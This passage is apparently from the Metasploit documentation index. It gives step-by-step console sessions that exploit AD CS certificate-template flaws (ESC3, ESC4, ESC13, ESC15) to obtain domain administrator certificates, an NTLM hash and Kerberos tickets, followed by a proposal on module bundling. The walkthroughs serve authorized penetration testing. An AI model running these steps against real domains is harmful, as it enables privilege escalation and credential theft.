CERT_TEMPLATE ESC3-Template2 CERT_TEMPLATE =&amp;gt; ESC3-Template2 msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; show options Module options (auxiliary/admin/dcerpc/icpr_cert): Name Current Setting Required Description ---- --------------- -------- ----------- ALT_DNS no Alternative certificate DNS ALT_UPN no Alternative certificate UPN (format: USER@DOMAIN) CA daforest-WIN-BR0CCBA815B-CA yes The target certificate authority CERT_TEMPLATE ESC3-Template2 yes The certificate template ON_BEHALF_OF DAFOREST\\Administrator no Username to request on behalf of (format: DOMAIN\\USE R) PFX /home/gwillcox/.msf4/loot/2022 no Certificate to request on behalf of 1216174221_default_unknown_win dows.ad.cs_027866.pfx RHOSTS 172.30.239.85 yes The target host(s), see https://github.com/rapid7/me tasploit-framework/wiki/Using-Metasploit RPORT 445 yes The target port (TCP) SMBDomain DAFOREST no The Windows domain to use for authentication SMBPass normalpass no The password for the specified username SMBUser normaluser no The username to authenticate as Auxiliary action: Name Description ---- ----------- REQUEST_CERT Request a certificate View the full module info with the info, or info -d command. msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; run [*] Running module against 172.30.239.85 [*] 172.30.239.85:445 - Requesting a certificate... [+] 172.30.239.85:445 - The requested certificate was issued. [*] 172.30.239.85:445 - Certificate UPN: [email protected] [*] 172.30.239.85:445 - Certificate SID: S-1-5-21-3290009963-1772292745-3260174523-500 [*] 172.30.239.85:445 - Certificate stored at: /home/gwillcox/.msf4/loot/20221216180342_default_unknown_windows.ad.cs_390825.pfx [*] Auxiliary module execution completed msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; . We can then use the kerberos/get_ticket module to gain a Kerberos ticket granting ticket (TGT) as the Administrator domain administrator. See the Getting A Kerberos Ticket section for more information. ",
    "url": "/docs/pentesting/active-directory/ad-certificates/attacking-ad-cs-esc-vulnerabilities.html#exploiting-esc3-to-gain-domain-administrator-privileges",
    "relUrl": "/docs/pentesting/active-directory/ad-certificates/attacking-ad-cs-esc-vulnerabilities.html#exploiting-esc3-to-gain-domain-administrator-privileges"
  },"23": {
    "doc": "Attacking AD CS ESC Vulnerabilities Using Metasploit",
    "title": "Exploiting ESC4 To Gain Domain Administrator Privileges",
    "content": "To exploit ESC4, we will require an account with write privileges over a certificate template object in Active Directory. This involves finding an object with weak permissions defined within the nTSecurityDescriptor field. With this object identified, we can modify it to reconfigure the template to be vulnerable to another ESC technique. First, we will use the icpr_cert module in an attempt to exploit ESC1 (by setting ALT_UPN). This fails because the ESC4-Test certificate template does not allow the certificate’s subject name to be supplied in the request (the CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT flag is not set in the msPKI-Certificate-Name-Flag field). msf6 &amp;gt; use auxiliary/admin/dcerpc/icpr_cert msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; set RHOSTS 172.30.239.85 RHOSTS =&amp;gt; 172.30.239.85 msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; set SMBUser normaluser SMBUser =&amp;gt; normaluser msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; set SMBPass normalpass SMBPass =&amp;gt; normalpass msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; set CA daforest-WIN-BR0CCBA815B-CA CA =&amp;gt; daforest-WIN-BR0CCBA815B-CA msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; set CERT_TEMPLATE ESC4-Test CERT_TEMPLATE =&amp;gt; ESC4-Test msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; set ALT_UPN [email protected] ALT_UPN =&amp;gt; [email protected] msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; run [*] Running module against 172.30.239.85 [-] 172.30.239.85:445 - There was an error while requesting the certificate. [-] 172.30.239.85:445 - Denied by Policy Module [-] 172.30.239.85:445 - Error details: [-] 172.30.239.85:445 - Source: (0x0009) FACILITY_SECURITY: The source of the error code is the Security API layer. [-] 172.30.239.85:445 - HRESULT: (0x80094812) CERTSRV_E_SUBJECT_EMAIL_REQUIRED: The email name is unavailable and cannot be added to the Subject or Subject Alternate name. [*] Auxiliary module execution completed msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; . Next, we use the ad_cs_cert_template module to update the ESC4-Test certificate template. This process first makes a backup of the certificate data that can be used later. Next, the local certificate template data is read and used to update the object in Active Directory. The local certificate template data can be modified to set a custom security descriptor. msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; use auxiliary/admin/ldap/ad_cs_cert_template msf6 auxiliary(admin/ldap/ad_cs_cert_template) &amp;gt; set RHOSTS 172.30.239.85 RHOSTS =&amp;gt; 172.30.239.85 msf6 auxiliary(admin/ldap/ad_cs_cert_template) &amp;gt; set USERNAME normaluser USERNAME =&amp;gt; normaluser msf6 auxiliary(admin/ldap/ad_cs_cert_template) &amp;gt; set PASSWORD normalpass PASSWORD =&amp;gt; normalpass msf6 auxiliary(admin/ldap/ad_cs_cert_template) &amp;gt; set CERT_TEMPLATE ESC4-Test CERT_TEMPLATE =&amp;gt; ESC4-Test msf6 auxiliary(admin/ldap/ad_cs_cert_template) &amp;gt; set ACTION UPDATE ACTION =&amp;gt; UPDATE msf6 auxiliary(admin/ldap/ad_cs_cert_template) &amp;gt; set VERBOSE true VERBOSE =&amp;gt; true msf6 auxiliary(admin/ldap/ad_cs_cert_template) &amp;gt; run [*] Running module against 172.30.239.85 [+] Successfully bound to the LDAP server! [*] Discovering base DN automatically [*] 172.30.239.85:389 Getting root DSE [+] 172.30.239.85:389 Discovered base DN: DC=daforest,DC=com [+] Read certificate template data for: CN=ESC4-Test,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=daforest,DC=com [*] Certificate template data written to: /home/smcintyre/.msf4/loot/20230505083802_default_172.30.239.85_windows.ad.cs.te_593597.json [*] Parsing SDDL text: D:PAI(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;AU) [+] The operation completed successfully! [*] Auxiliary module execution completed msf6 auxiliary(admin/ldap/ad_cs_cert_template) &amp;gt; . Now that the certificate template has been updated to be vulnerable to ESC1, then we can use the previous shortcut to switch back to the last module and reattempt to issue the certificate. This time, the operation succeeds. msf6 auxiliary(admin/ldap/ad_cs_cert_template) &amp;gt; previous msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; run [*] Running module against 172.30.239.85 [+] 172.30.239.85:445 - The requested certificate was issued. [*] 172.30.239.85:445 - Certificate UPN: [email protected] [*] 172.30.239.85:445 - Certificate stored at: /home/smcintyre/.msf4/loot/20230505083913_default_172.30.239.85_windows.ad.cs_275324.pfx [*] Auxiliary module execution completed msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; . Finally, we switch back to the ad_cs_cert_template module to restore the original configuration. We do this by setting the local template data option TEMPLATE_FILE to the JSON file that was created by the previous run. msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; previous msf6 auxiliary(admin/ldap/ad_cs_cert_template) &amp;gt; set TEMPLATE_FILE /home/smcintyre/.msf4/loot/20230505083802_default_172.30.239.85_windows.ad.cs.te_593597.json TEMPLATE_FILE =&amp;gt; /home/smcintyre/.msf4/loot/20230505083802_default_172.30.239.85_windows.ad.cs.te_593597.json msf6 auxiliary(admin/ldap/ad_cs_cert_template) &amp;gt; run [*] Running module against 172.30.239.85 [+] Successfully bound to the LDAP server! [*] Discovering base DN automatically [*] 172.30.239.85:389 Getting root DSE [+] 172.30.239.85:389 Discovered base DN: DC=daforest,DC=com [+] Read certificate template data for: CN=ESC4-Test,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=daforest,DC=com [*] Certificate template data written to: /home/smcintyre/.msf4/loot/20230505083942_default_172.30.239.85_windows.ad.cs.te_000095.json [+] The operation completed successfully! [*] Auxiliary module execution completed msf6 auxiliary(admin/ldap/ad_cs_cert_template) &amp;gt; . At this point the certificate template’s configuration has been restored and the operator has a certificate that can be used to authenticate to Active Directory as the Domain Admin. ",
    "url": "/docs/pentesting/active-directory/ad-certificates/attacking-ad-cs-esc-vulnerabilities.html#exploiting-esc4-to-gain-domain-administrator-privileges",
    "relUrl": "/docs/pentesting/active-directory/ad-certificates/attacking-ad-cs-esc-vulnerabilities.html#exploiting-esc4-to-gain-domain-administrator-privileges"
  },"24": {
    "doc": "Attacking AD CS ESC Vulnerabilities Using Metasploit",
    "title": "Exploiting ESC13",
    "content": "To exploit ESC13, we need to target a certificate that has an issuance policy linked to a universal group in Active Directory. Unlike some of the other ESC techniques, successfully exploiting ESC13 isn’t necessarily guaranteed to yield administrative privileges, rather the privileges that are gained are those of the group which is linked to by OID in the certificate template’s issuance policy. The auxiliary/gather/ldap_esc_vulnerable_cert_finder module is capable of identifying certificates that meet the necessary criteria. When one is found, the module will include the group whose permissions will be included in the resulting Kerberos ticket in the notes section. In the following example, the ESC13-Test template is vulenerable to ESC13 and will yield a ticket including the ESC13-Group permissions. msf6 auxiliary(gather/ldap_esc_vulnerable_cert_finder) &amp;gt; run ... [+] Template: ESC13-Test [*] Distinguished Name: CN=ESC13-Test,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=collalabs1,DC=local [*] Manager Approval: Disabled [*] Required Signatures: 0 [+] Vulnerable to: ESC13 [*] Notes: ESC13 groups: ESC13-Group [*] Certificate Template Enrollment SIDs: [*] * S-1-5-21-3474343397-3755413101-2031708755-512 (Domain Admins) [*] * S-1-5-21-3474343397-3755413101-2031708755-513 (Domain Users) [*] * S-1-5-21-3474343397-3755413101-2031708755-519 (Enterprise Admins) [+] Issuing CA: collalabs1-SRV-ADDS01-CA (SRV-ADDS01.collalabs1.local) [*] Enrollment SIDs: [*] * S-1-5-11 (Authenticated Users) [*] * S-1-5-21-3474343397-3755413101-2031708755-519 (Enterprise Admins) [*] * S-1-5-21-3474343397-3755413101-2031708755-512 (Domain Admins) . In this case, the ticket can be issued with the icpr_cert module. No additional options are required to issue the certificate beyond the standard CA, CERT_TEMPLATE, target and authentication options. msf6 &amp;gt; use auxiliary/admin/dcerpc/icpr_cert msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; set RHOSTS 172.30.239.85 RHOSTS =&amp;gt; 172.30.239.85 msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; set SMBUser normaluser SMBUser =&amp;gt; normaluser msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; set SMBDomain COLLALABS1 SMBDomain =&amp;gt; COLLALABS1 msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; set SMBPass normalpass SMBPass =&amp;gt; normalpass msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; set CA collalabs1-SRV-ADDS01-CA CA =&amp;gt; collalabs1-SRV-ADDS01-CA msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; set CERT_TEMPLATE ESC13-Test CERT_TEMPLATE =&amp;gt; ESC13-Test msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; run [*] Running module against 172.30.239.85 [+] 172.30.239.85:445 - The requested certificate was issued. [*] 172.30.239.85:445 - Certificate Email: [email protected] [*] 172.30.239.85:445 - Certificate SID: S-1-5-21-3474343397-3755413101-2031708755-10051 [*] 172.30.239.85:445 - Certificate UPN: [email protected] [*] 172.30.239.85:445 - Certificate stored at: /home/normaluser/.msf4/loot/20240226170310_default_172.30.239.85_windows.ad.cs_917878.pfx [*] Auxiliary module execution completed msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; . We can then use the kerberos/get_ticket module to gain a Kerberos ticket granting ticket (TGT) with the ESC13-Group RID present in the Groups field of the TGT PAC. ",
    "url": "/docs/pentesting/active-directory/ad-certificates/attacking-ad-cs-esc-vulnerabilities.html#exploiting-esc13",
    "relUrl": "/docs/pentesting/active-directory/ad-certificates/attacking-ad-cs-esc-vulnerabilities.html#exploiting-esc13"
  },"25": {
    "doc": "Attacking AD CS ESC Vulnerabilities Using Metasploit",
    "title": "Exploiting ESC15",
    "content": "Steps for exploiting ESC15 are similar to ESC1 whereby a privileged user such as a domain admin is specified in the ALT_UPN. In addition to targeting another user, the certificate has additional Application Policy OIDs added to it which adjusts the context in which the issued certificate can be used. These policy OIDs are accepted by the issuing CA if the target certificate template is defined using schema version 1. In the following example, the Client Authentication OID (1.3.6.1.5.5.7.3.2) is added which enables the certificate to be used for authentication to LDAP via SCHANNEL. The operator can then perform LDAP queries with the privileges of the user specified in the alternate UPN. msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; set RHOSTS 172.30.239.85 RHOSTS =&amp;gt; 172.30.239.85 msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; set SMBUser normaluser SMBUser =&amp;gt; normaluser msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; set SMBDomain COLLALABS1 SMBDomain =&amp;gt; COLLALABS1 msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; set SMBPass normalpass SMBPass =&amp;gt; normalpass msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; set CA collalabs1-SRV-ADDS01-CA CA =&amp;gt; collalabs1-SRV-ADDS01-CA msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; set CERT_TEMPLATE ESC15-Test CERT_TEMPLATE =&amp;gt; ESC15-Test msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; set ADD_CERT_APP_POLICY 1.3.6.1.5.5.7.3.2 ADD_CERT_APP_POLICY =&amp;gt; 1.3.6.1.5.5.7.3.2 msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; set ALT_UPN [email protected] ALT_UPN =&amp;gt; [email protected] msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; set ALT_SID S-1-5-21-3402587289-1488798532-3618296993-1000 ALT_SID =&amp;gt; S-1-5-21-3402587289-1488798532-3618296993-1000 msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; run [*] Running module against 172.30.239.85 [*] 172.30.239.85:445 - Requesting a certificate... [+] 172.30.239.85:445 - The requested certificate was issued. [*] 172.30.239.85:445 - Certificate UPN: [email protected] [*] 172.30.239.85:445 - Certificate Policies: [*] 172.30.239.85:445 - * 1.3.6.1.5.5.7.3.2 (Client Authentication) [*] 172.30.239.85:445 - Certificate stored at: /home/normaluser/.msf4/loot/20241009171337_default_172.30.239.85_windows.ad.cs_089081.pfx [*] Auxiliary module execution completed msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; . Certificates issued using this technique are not directly able to be used for Kerberos authentication via PKINIT. However, the attack can be modified by adding the Certificate Request Agent OID (1.3.6.1.4.1.311.20.2.1) to issue a certificate that can issue additional certificates in a manner similar to ESC2 which are compatible with PKINIT. msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; set RHOSTS 172.30.239.85 RHOSTS =&amp;gt; 172.30.239.85 msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; set SMBUser normaluser SMBUser =&amp;gt; normaluser msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; set SMBDomain COLLALABS1 SMBDomain =&amp;gt; COLLALABS1 msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; set SMBPass normalpass SMBPass =&amp;gt; normalpass msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; set CA collalabs1-SRV-ADDS01-CA CA =&amp;gt; collalabs1-SRV-ADDS01-CA msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; set CERT_TEMPLATE ESC15-Test CERT_TEMPLATE =&amp;gt; ESC15-Test msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; set ADD_CERT_APP_POLICY 1.3.6.1.4.1.311.20.2.1 ADD_CERT_APP_POLICY =&amp;gt; 1.3.6.1.4.1.311.20.2.1 msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; run [*] Running module against 172.30.239.85 [*] 172.30.239.85:445 - Requesting a certificate... [+] 172.30.239.85:445 - The requested certificate was issued. [*] 172.30.239.85:445 - Certificate UPN: [email protected] [*] 172.30.239.85:445 - Certificate Policies: [*] 172.30.239.85:445 - * 1.3.6.1.4.1.311.20.2.1 (Certificate Request Agent) [*] 172.30.239.85:445 - Certificate stored at: /home/normaluser/.msf4/loot/20241009172714_default_172.30.239.85_windows.ad.cs_659672.pfx [*] Auxiliary module execution completed msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; . Next, the certificate is used in conjunction with the PFX and ON_BEHALF_OF options to issue a certificate compatible with Kerberos as the privileged user (previously ALT_UPN). msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; unset ADD_CERT_APP_POLICY Unsetting ADD_CERT_APP_POLICY... msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; unset ALT_UPN Unsetting ALT_UPN... msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; set CERT_TEMPLATE User CERT_TEMPLATE =&amp;gt; User msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; set ON_BEHALF_OF COLLALABS1\\\\administrator ON_BEHALF_OF =&amp;gt; COLLALABS1\\\\administrator msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; set PFX /home/normaluser/.msf4/loot/20241009172714_default_172.30.239.85_windows.ad.cs_659672.pfx PFX =&amp;gt; /home/normaluser/.msf4/loot/20241009172714_default_172.30.239.85_windows.ad.cs_659672.pfx msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; run [*] Running module against 172.30.239.85 [*] 172.30.239.85:445 - Requesting a certificate... [+] 172.30.239.85:445 - The requested certificate was issued. [*] 172.30.239.85:445 - Certificate Email: [email protected] [*] 172.30.239.85:445 - Certificate UPN: [email protected] [*] 172.30.239.85:445 - Certificate stored at: /home/normaluser/.msf4/loot/20241009172817_default_172.30.239.85_windows.ad.cs_427087.pfx [*] Auxiliary module execution completed msf6 auxiliary(admin/dcerpc/icpr_cert) &amp;gt; . Finally, this certificate can be used to authenticate to Kerberos with the kerberos/get_ticket module. ",
    "url": "/docs/pentesting/active-directory/ad-certificates/attacking-ad-cs-esc-vulnerabilities.html#exploiting-esc15",
    "relUrl": "/docs/pentesting/active-directory/ad-certificates/attacking-ad-cs-esc-vulnerabilities.html#exploiting-esc15"
  },"26": {
    "doc": "Attacking AD CS ESC Vulnerabilities Using Metasploit",
    "title": "Authenticating With A Certificate",
    "content": "Metasploit supports authenticating with certificates in a couple of different ways. These techniques can be used to take further actions once a certificate has been issued for a particular identity (such as a Domain Admin user). ",
    "url": "/docs/pentesting/active-directory/ad-certificates/attacking-ad-cs-esc-vulnerabilities.html#authenticating-with-a-certificate",
    "relUrl": "/docs/pentesting/active-directory/ad-certificates/attacking-ad-cs-esc-vulnerabilities.html#authenticating-with-a-certificate"
  },"27": {
    "doc": "Attacking AD CS ESC Vulnerabilities Using Metasploit",
    "title": "Authenticating To Kerberos",
    "content": "Certificates can be used to authenticate to Kerberos using the kerberos/get_ticket module by specifying the CERT_FILE option. Take the certificate file from the last stage of the attack and set it as the CERT_FILE. Certificates from Metasploit do not require a password, but if the certificate was generated from a source that added one, it can be specified in the CERT_PASSWORD option. Set the RHOST to the Domain Controller which is the Key Distribution Center (KDC) for the Active Directory environment. Getting An NT Hash . Certificates can be used to obtain the NTLM hash of an account with the PKINIT extension. To request the hash, set the action to GET_HASH. msf6 auxiliary(admin/kerberos/get_ticket) &amp;gt; get_hash rhosts=172.30.239.85 cert_file=/home/smcintyre/.msf4/loot/20230505083913_default_172.30.239.85_windows.ad.cs_275324.pfx [*] Running module against 172.30.239.85 [+] 172.30.239.85:88 - Received a valid TGT-Response [*] 172.30.239.85:88 - TGT MIT Credential Cache ticket saved to /home/smcintyre/.msf4/loot/20230505094204_default_172.30.239.85_mit.kerberos.cca_324339.bin [*] 172.30.239.85:88 - Getting NTLM hash for [email protected] [+] 172.30.239.85:88 - Received a valid TGS-Response [*] 172.30.239.85:88 - TGS MIT Credential Cache ticket saved to /home/smcintyre/.msf4/loot/20230505094204_default_172.30.239.85_mit.kerberos.cca_031414.bin [+] Found NTLM hash for Administrator: aad3b435b51404eeaad3b435b51404ee:7facdc498ed1680c4fd1448319a8c04f [*] Auxiliary module execution completed msf6 auxiliary(admin/kerberos/get_ticket) &amp;gt; . Getting A Kerberos Ticket . Certificates can be used to issue a Kerberos ticket granting ticket (TGT) which in turn can be used to authenticate to services such as HTTP, LDAP and SMB. Ticket granting tickets can be requested using the GET_TGT action. msf6 auxiliary(admin/kerberos/get_ticket) &amp;gt; get_tgt rhosts=172.30.239.85 cert_file=/home/smcintyre/.msf4/loot/20230124173224_default_172.30.239.85_windows.ad.cs_287833.pfx [*] Running module against 172.30.239.85 [*] 172.30.239.85:88 - Getting TGT for [email protected] [+] 172.30.239.85:88 - Received a valid TGT-Response [*] 172.30.239.85:88 - TGT MIT Credential Cache ticket saved to /home/smcintyre/.msf4/loot/20230124202354_default_172.30.239.85_mit.kerberos.cca_566767.bin [*] Auxiliary module execution completed msf6 auxiliary(admin/kerberos/get_ticket) &amp;gt; klist Kerberos Cache ============== host principal sname issued status path ---- --------- ----- ------ ------ ---- 172.30.239.85 [email protected] krbtgt/[email protected] 2023-01-24 20:23:54 -0500 valid /home/smcintyre/.msf4/loot/20230124202354_default_172.30.239.85_mit.kerberos.cca_566767.bin msf6 auxiliary(admin/kerberos/get_ticket) &amp;gt; . Once the TGT has been issued, it can be seen in the output of the klist command. With the TGT saved, it will automatically be used in the future to request ticket granting services (TGS) for authentication to specific services. ",
    "url": "/docs/pentesting/active-directory/ad-certificates/attacking-ad-cs-esc-vulnerabilities.html#authenticating-to-kerberos",
    "relUrl": "/docs/pentesting/active-directory/ad-certificates/attacking-ad-cs-esc-vulnerabilities.html#authenticating-to-kerberos"
  },"28": {
    "doc": "Attacking AD CS ESC Vulnerabilities Using Metasploit",
    "title": "Authenticating To LDAP",
    "content": "Certificates can also be used to directly authenticate to LDAP using schannel. Metasploit modules that use the builtin LDAP library (including auxiliary/gather/ldap_query) offer this as an authentication option that can be enabled. To use schannel authentication a few options must be set. | LDAP::Auth – must be set to schannel | LDAP::CertFile – must be set to the PFX certificate file with which to authenticate | SSL – must be set to true (schannel authentication is only compatible with TLS connections) | . msf6 auxiliary(gather/ldap_query) &amp;gt; set RHOSTS 172.30.239.85 RHOSTS =&amp;gt; 172.30.239.85 msf6 auxiliary(gather/ldap_query) &amp;gt; set LDAP::Auth schannel LDAP::Auth =&amp;gt; schannel msf6 auxiliary(gather/ldap_query) &amp;gt; set LDAP::CertFile /home/smcintyre/.msf4/loot/20230505083913_default_172.30.239.85_windows.ad.cs_275324.pfx LDAP::CertFile =&amp;gt; /home/smcintyre/.msf4/loot/20230505083913_default_172.30.239.85_windows.ad.cs_275324.pfx msf6 auxiliary(gather/ldap_query) &amp;gt; set SSL true [!] Changing the SSL option's value may require changing RPORT! SSL =&amp;gt; true msf6 auxiliary(gather/ldap_query) &amp;gt; enum_domain [*] Running module against 172.30.239.85 [*] Discovering base DN automatically [+] 172.30.239.85:389 Discovered base DN: DC=daforest,DC=com [+] 172.30.239.85:389 Discovered schema DN: DC=daforest,DC=com DC=msflab DC=local ================== Name Attributes ---- ---------- lockoutduration 0:00:30:00 lockoutthreshold 0 maxpwdage 42:00:00:00 minpwdage 1:00:00:00 minpwdlength 7 ms-ds-machineaccountquota 10 name msflab objectsid S-1-5-21-3402587289-1488798532-3618296993 [*] Auxiliary module execution completed msf6 auxiliary(gather/ldap_query) &amp;gt; . ",
    "url": "/docs/pentesting/active-directory/ad-certificates/attacking-ad-cs-esc-vulnerabilities.html#authenticating-to-ldap",
    "relUrl": "/docs/pentesting/active-directory/ad-certificates/attacking-ad-cs-esc-vulnerabilities.html#authenticating-to-ldap"
  },"29": {
    "doc": "Attacking AD CS ESC Vulnerabilities Using Metasploit",
    "title": "Attacking AD CS ESC Vulnerabilities Using Metasploit",
    "content": " ",
    "url": "/docs/pentesting/active-directory/ad-certificates/attacking-ad-cs-esc-vulnerabilities.html",
    "relUrl": "/docs/pentesting/active-directory/ad-certificates/attacking-ad-cs-esc-vulnerabilities.html"
  },"30": {
    "doc": "Bundled Modules Proposal",
    "title": "Bundled Modules",
    "content": "Created by Adam Cammack . As Metasploit modules continue to grow in number and capability the current separation of module information by type grows more cumbersome. Starting next year, we want all the files related to a module (docs, libraries, sources, build info, etc.) to live as closely together and be as hackable as possible. To this end, we have come up with the concept of “module bundles” to help improve module dependency isolation and locality of information. We hope the format will prove flexible enough to accommodate the wide range of modules we have and uniform enough to not cause confusion among community members and contributors. Eventually, we may even be able to package each module separately for distribution. Whether or not this bundled format will support the old style of module is uncertain. It could be made to work, I think, but it would require a fair bit of effort and ingenuity to work cleanly. For simplicity, I will describe the bundle concept as it applies to external/coldstone modules and then describe potential adaptations at the end. ",
    "url": "/docs/development/propsals/bundled-modules-proposal.html#bundled-modules",
    "relUrl": "/docs/development/propsals/bundled-modules-proposal.html#bundled-modules"
  },"31": {
    "doc": "Bundled Modules Proposal",
    "title": "Directory structure",
    "content": "Example complicated Ruby module: . $ tree --dirsfirst --charset=ascii -F bundled_module/ bundled_module/ |-- data/ | `-- stack_smash |-- docs/ |-- bundled_module.md |-- poc.py | `-- success.pcap |-- lib/ |-- foo/ | |-- bar.rb | `-- baz.rb | `-- foo.rb |-- src/ | `-- stack_smash.s |-- templates/ | `-- exploit.ps.erb |-- Dockerfile |-- Gemfile |-- Gemfile.lock |-- Rakefile |-- bundled_module.rb* `-- metadata.json . ",
    "url": "/docs/development/propsals/bundled-modules-proposal.html#directory-structure",
    "relUrl": "/docs/development/propsals/bundled-modules-proposal.html#directory-structure"
  },"32": {
    "doc": "Bundled Modules Proposal",
    "title": "Aside: things I’m not sure of and reference vaguely",
    "content": ". | Would the main executable be named after the module (same as the directory, maybe with extension), or given a | standard name? | Would the JSON metadata file be named after the module or given a standard name? | Would we ever allow multiple closely related modules per directory? (eg. routersploit integration, impacts how we think about the above) | If so or not, how would we deal with closely related functionality that has different options for different actions? | Do things like client blobs (HTML, JavaScript, images, etc.) belong in data/ or should we also have a static/? (static/ seems to get a bit fiddly to me; data/static/?) | . ",
    "url": "/docs/development/propsals/bundled-modules-proposal.html#aside-things-im-not-sure-of-and-reference-vaguely",
    "relUrl": "/docs/development/propsals/bundled-modules-proposal.html#aside-things-im-not-sure-of-and-reference-vaguely"
  },"33": {
    "doc": "Bundled Modules Proposal",
    "title": "Required files",
    "content": "To keep overhead to a minimum for hackers who are developing modules, we need to minimize files that the author will need to create, touch, and understand for most tasks (restated: every file an author must touch should be directly related to particular and specialized functionality that they want as part of the preparation or execution of a module). The most minimal module only requires the main executable to be present. When loading modules, framework will see a leaf directory without certain expected files and will generate the default ones automatically. This behaviour can be later augmented with guessing of which defaults based on what is present in the directory. | If Rakefile is absent, framework will generate one that references the shared rake tasks. | If Gemfile is absent and the executable ends in .rb, framework will generate one that depends on the bridge libraries from source. | If metadata.json is absent, framework will generate it using rake. | . All this generation logic should be available as part of a standalone scaffolding tool. ",
    "url": "/docs/development/propsals/bundled-modules-proposal.html#required-files",
    "relUrl": "/docs/development/propsals/bundled-modules-proposal.html#required-files"
  },"34": {
    "doc": "Bundled Modules Proposal",
    "title": "Keeping it all close",
    "content": "One of the drawbacks of the current module system is that all the files related to the development, documentation, and execution of a module live in different places. Some information, like dependencies, is only tracked implicitly or lossily in code or in the top-level specifications of framework. This makes programmatically determining what a module is, targets, or requires fraught with fragile code. Metadata . The metadata will be kept in JSON in a file (or several, see my uncertainties above) that is built by rake. Keeping the metadata cached per-module gives us several capabilities. First, updates look more logical in commits, and the files can be updated as part of the standard PR/landing process. Next, dependency tracking of when the metadata needs to be updated can be offloaded to standard build tool capabilities. Because invoking rake has overhead, any metadata that exists should be considered correct during initial module discovery. Any modules without metadata should then have it generated via rake. Next, every module should have its metadata building task run to (and stale metadata replaced) ensure correctness. If a module is use’d before this process completes, it must have it metadata refreshed via rake if needed as part of the loading process. Since modules are independent, the whole discovery/refreshing process is parallelizable, reducing wall time. In addition to the information we currently cache, we will want to cache any information a user might see or want to know so that, if the cached metadata is more recent than any module files, nothing has to be built or run to use the module. Notably, this includes options and module archetype (which in the future directly map options for user convince, vs the shim approach take today). Build info . All additional build info should be specified as tasks in the module Rakefile. As much a possible, this should also include building with IDE environments, like Visual Studio. Even if the binaries are checked in to reduce runtime requirements (see below), it is still invaluable to know how something was built in the first place. Blobs and sources . Sources are handy, it should be easy to find them! Now they will live in the module in the src/ directory. Here the Rakefile can easily find them and transform them into the beautiful exploitation resources they were meant to be. As much as possible, only sources should be checked into the tree. For super-specific platform targeting things though, that’s not always feasible (eg. VisualStudio projects). It’s times like these that the data/ directory should be used. As mentioned above, the Rakefile should still be able to build the thing given the correct environment. Blobs or assets without a checked-in source also belong in data/, like images or downloaded things. Things for client exploits to download should probably also go in here, like HTML files and static JavaScripts. Templates . Modules that use a large literal interspersed with runtime data should use the templates/ directory to store templates. ERB should be used for printable data by Ruby, and equivalents for other languages (DTL, mustache, etc.). Binary data should maybe be blobs with accompanying offset listings? . Docs . The docs/ directory will contain the files that a user will reference when trying to understand module. This may include PoCs, markdown, pcaps, etc. The HTML we currently show to users would be generated from the module and files here using rake tasks. Additional tooling . One advantage that this directory structure gives us is the ability to write better tooling for it than we have for the current iteration of modules. One downside is that we will need it to in order to make the format accessible to hackers. Shared build tasks . Because all routine module-oriented tasks will be performed with rake tasks, we will need to make the default actions for these tasks as intelligent and reusable as possible across different module types/implementations. A module author should not have to worry about writing plumbing they do not need (or is common) or messing with plumbing that is only tangentially related to their unique need. To that end, we should have sane defaults for the following at a minimum: . rake run -- Start module, hook up stdin/stdout to JSON-RPC rake metadata -- Generate metadata JSON rake tidy:code -- Run tidiness checks against the code rake tidy:metadata -- Run tidiness 